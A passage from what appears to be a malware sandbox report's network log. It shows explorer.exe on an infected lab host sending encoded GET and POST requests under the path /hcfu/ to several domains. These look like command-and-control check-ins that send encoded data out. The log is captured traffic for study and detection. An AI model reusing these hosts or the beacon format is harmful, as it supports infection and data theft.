6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 27 72 65 20 6c 6f 73 74 2e 2e 2e 3c 62 72 2f 3e 54 68 61 74 27 73 20 61 20 74 72 6f 75 62 6c 65 3f 3c 2f 70 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 47 6f 20 62 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>Error 404</title> <link href='https://fonts.googleapis.com/css?family=Nunito:400,700' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css?family=Varela+Round' rel='stylesheet' type='text/css'><link rel="stylesheet" href="/style.css"></head><body><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="main"> <h1>404</h1> <p>It looks like you're lost...<br/>That's a trouble?</p> <button type="button">Go back</button></div> <script src="/script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.7	49720	192.64.116.149	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:50.053051949 CEST	403	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=UPFzOWHvXr6LKM54fFGvr+bgYv8T+gbn3IMA7mHIEAJt3ghNPXPHkJgJBAr3zVB6bc8AwaR/viz1MkvVp6+rG9931Jf00GsCyWVh4zhHjPJo HTTP/1.1 Host: www.bandmarket.live Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:50.331476927 CEST	404	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:07:50 GMT Server: Apache Content-Length: 688 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 3a 34 30 30 2c 37 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 56 61 72 65 6c 61 2b 52 6f 75 6e 64 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 70 3e 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 27 72 65 20 6c 6f 73 74 2e 2e 2e 3c 62 72 2f 3e 54 68 61 74 27 73 20 61 20 74 72 6f 75 62 6c 65 3f 3c 2f 70 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 47 6f 20 62 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>Error 404</title> <link href='https://fonts.googleapis.com/css?family=Nunito:400,700' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css?family=Varela+Round' rel='stylesheet' type='text/css'><link rel="stylesheet" href="/style.css"></head><body><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="main"> <h1>404</h1> <p>It looks like you're lost...<br/>That's a trouble?</p> <button type="button">Go back</button></div> <script src="/script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.7	49721	185.106.208.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:55.578289032 CEST	405	OUT	POST /hcfu/ HTTP/1.1 Host: www.aurakids.website Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.aurakids.website User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.aurakids.website/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 41 37 34 49 64 4f 35 4e 55 4e 6b 77 48 30 42 66 34 62 4c 44 78 6f 7a 4a 65 51 4f 4f 4b 31 30 72 30 63 30 6e 56 6c 49 71 57 32 72 38 68 4d 74 73 78 4f 5a 2d 55 46 52 4a 39 4b 5a 61 6e 4a 39 5a 43 35 6b 45 58 6e 75 75 4e 4d 72 4b 4c 6c 37 48 66 49 76 68 70 32 4a 77 57 73 4e 36 53 77 35 74 6a 73 68 4e 58 51 68 49 63 39 57 43 57 72 4f 77 55 5f 76 64 38 5a 45 2d 62 47 4c 73 47 4e 37 39 57 50 63 4b 32 71 50 75 41 43 6b 39 43 48 65 77 57 43 4a 4d 72 56 62 41 48 39 67 34 7a 70 39 4a 7e 6f 51 69 6b 52 50 62 32 67 30 35 78 69 6b 65 4d 5a 6d 66 6d 6e 59 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=A74IdO5NUNkwH0Bf4bLDxozJeQOOK10r0c0nVlIqW2r8hMtsxOZ-UFRJ9KZanJ9ZC5kEXnuuNMrKLl7HfIvhp2JwWsN6Sw5tjshNXQhIc9WCWrOwU_vd8ZE-bGLsGN79WPcK2qPuACk9CHewWCJMrVbAH9g4zp9J~oQikRPb2g05xikeMZmfmnY.
Oct 24, 2022 11:07:55.639941931 CEST	406	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:07:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.7	49722	185.106.208.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:07:57.667169094 CEST	406	OUT	GET /hcfu/?u0Gp2vp8=N5Qoe7UIPaIJGls62JHU55z9VEWHJXpA5+wYVkYKdF3K4Zdll/5ZVGJr2YZtu9BOKd0IRETCZdDAH2zdX5+9rG9zeMIKFk9wrK0cQWJhYt3t&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.aurakids.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:07:57.730324030 CEST	407	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:07:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.7	49723	85.159.66.93	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:02.899678946 CEST	408	OUT	POST /hcfu/ HTTP/1.1 Host: www.parkperge.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.parkperge.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.parkperge.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 65 68 53 66 4e 6b 77 34 4c 34 68 6d 46 71 58 52 68 62 6c 56 44 6e 32 68 59 76 73 35 69 58 66 50 53 6a 43 78 73 78 72 71 4b 48 46 58 69 30 76 32 7e 48 66 6b 71 69 70 33 66 68 58 48 31 4c 62 74 41 6c 4e 46 75 50 78 48 71 78 77 58 47 57 41 45 65 52 33 67 72 6b 79 67 38 47 6b 66 71 56 58 38 49 2d 75 54 35 6f 6d 6e 72 31 6f 4a 4f 6f 49 4b 55 37 36 48 45 45 65 66 45 30 46 4f 6c 74 46 50 34 30 52 34 36 35 64 7a 6c 39 7a 73 30 53 48 35 31 51 73 5f 69 6e 50 74 78 75 6d 4a 39 39 6c 31 6d 55 50 34 42 4f 34 77 6b 79 63 52 63 4a 7e 69 78 4b 63 4f 28 64 73 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=ehSfNkw4L4hmFqXRhblVDn2hYvs5iXfPSjCxsxrqKHFXi0v2~Hfkqip3fhXH1LbtAlNFuPxHqxwXGWAEeR3grkyg8GkfqVX8I-uT5omnr1oJOoIKU76HEEefE0FOltFP40R465dzl9zs0SH51Qs_inPtxumJ99l1mUP4BO4wkycRcJ~ixKcO(ds.
Oct 24, 2022 11:08:02.999944925 CEST	408	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 24 Oct 2022 09:08:02 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 39 X-Rate-Limit-Reset: 2022-10-24T09:08:07.9761631Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49706	66.96.162.130	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:06:54.470487118 CEST	354	OUT	GET /hcfu/?u0Gp2vp8=yYn+qZAupgKndVEJZAA+lgE9F5IM2sy/uZGFuMXNIoF6xPzYCilz1R0fY+ZXeAeHxVBnntuSE8HuR3hJw5pyMvZ/VaC3rRJ0nFaxYVwTY2Y1&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.modbox.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:06:54.628061056 CEST	355	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:06:54 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.7	49724	85.159.66.93	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:04.968530893 CEST	409	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:05.245462894 CEST	409	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:05.557949066 CEST	409	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:06.167383909 CEST	410	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:07.370493889 CEST	410	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:08.573793888 CEST	410	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:09.777018070 CEST	410	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:12.183487892 CEST	411	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:16.996413946 CEST	411	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1 Host: www.parkperge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.7	49725	38.40.162.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:31.998338938 CEST	412	OUT	POST /hcfu/ HTTP/1.1 Host: www.paulmontecalvo.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.paulmontecalvo.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.paulmontecalvo.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 73 69 47 66 57 57 49 57 48 64 7e 6b 45 7a 61 4a 6c 47 4d 71 45 32 53 4e 66 7a 46 77 7a 76 6a 68 6b 57 6f 51 69 76 74 66 62 65 46 77 35 65 51 51 4b 43 59 54 36 78 51 6e 76 48 4a 48 77 5a 44 32 6d 4a 48 4b 46 6d 4c 38 37 73 71 46 39 78 36 39 34 67 28 64 37 36 42 6f 49 4c 79 31 34 4e 58 59 72 39 57 59 6c 30 59 5f 4b 38 71 54 49 73 5a 68 7e 35 4e 5a 44 41 43 6d 34 35 35 51 59 72 44 35 77 4b 66 51 61 6f 38 4e 7e 4e 4a 2d 32 66 52 63 59 76 6c 36 67 71 4f 34 77 4b 4c 73 4f 44 6a 68 54 44 52 4c 72 65 6c 69 76 37 70 4d 37 4d 63 42 35 41 4c 31 71 77 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=siGfWWIWHd~kEzaJlGMqE2SNfzFwzvjhkWoQivtfbeFw5eQQKCYT6xQnvHJHwZD2mJHKFmL87sqF9x694g(d76BoILy14NXYr9WYl0Y_K8qTIsZh~5NZDACm455QYrD5wKfQao8N~NJ-2fRcYvl6gqO4wKLsODjhTDRLreliv7pM7McB5AL1qwk.
Oct 24, 2022 11:08:32.157023907 CEST	412	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:08:32 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.7	49726	38.40.162.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:34.199551105 CEST	413	OUT	GET /hcfu/?u0Gp2vp8=hgu/VmoXDf6UNxe0oUcrLUetbm135fy9k2oFvNtbYeh4n6osOzYSt1ckvEFN+4fwt+77PX6U4+O9/Te6nTne3r1wHJXq9JP+reirnUB6JbLe&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.paulmontecalvo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:34.357724905 CEST	413	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 24 Oct 2022 09:08:34 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.7	49727	63.32.216.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:39.459991932 CEST	415	OUT	POST /hcfu/ HTTP/1.1 Host: www.lilustrlousdates.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.lilustrlousdates.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.lilustrlousdates.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 31 42 7e 55 4c 46 48 68 4b 78 6a 34 28 68 73 74 74 36 6a 42 65 5a 5a 42 32 43 32 59 39 36 71 6d 61 37 6c 32 55 41 79 73 34 4a 6d 32 6b 65 6c 5a 68 73 28 57 33 47 35 6e 46 49 39 77 76 78 30 4b 4c 35 73 4e 62 54 30 51 51 31 45 45 79 2d 4a 4d 6c 6a 33 78 58 62 4d 74 39 41 35 44 45 5f 7e 72 55 39 42 46 54 72 68 73 67 39 6e 4a 68 6e 61 38 69 52 79 34 44 50 53 64 71 56 41 32 38 7a 37 62 75 79 49 79 69 33 6b 4c 45 73 72 38 6b 6f 56 68 6f 30 4d 67 41 62 79 6b 74 5f 55 67 5a 4b 44 4e 74 4d 56 7a 4a 32 45 76 48 4b 78 50 71 65 55 32 5a 44 32 59 46 32 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=1B~ULFHhKxj4(hstt6jBeZZB2C2Y96qma7l2UAys4Jm2kelZhs(W3G5nFI9wvx0KL5sNbT0QQ1EEy-JMlj3xXbMt9A5DE_~rU9BFTrhsg9nJhna8iRy4DPSdqVA28z7buyIyi3kLEsr8koVho0MgAbykt_UgZKDNtMVzJ2EvHKxPqeU2ZD2YF2M.
Oct 24, 2022 11:08:39.506207943 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 24 Oct 2022 09:08:39 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 46 Connection: close Data Raw: 53 69 74 65 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2c 20 70 6c 65 61 73 65 20 76 69 73 69 74 20 6c 61 74 65 72 Data Ascii: Site is under construction, please visit later

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.7	49728	63.32.216.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
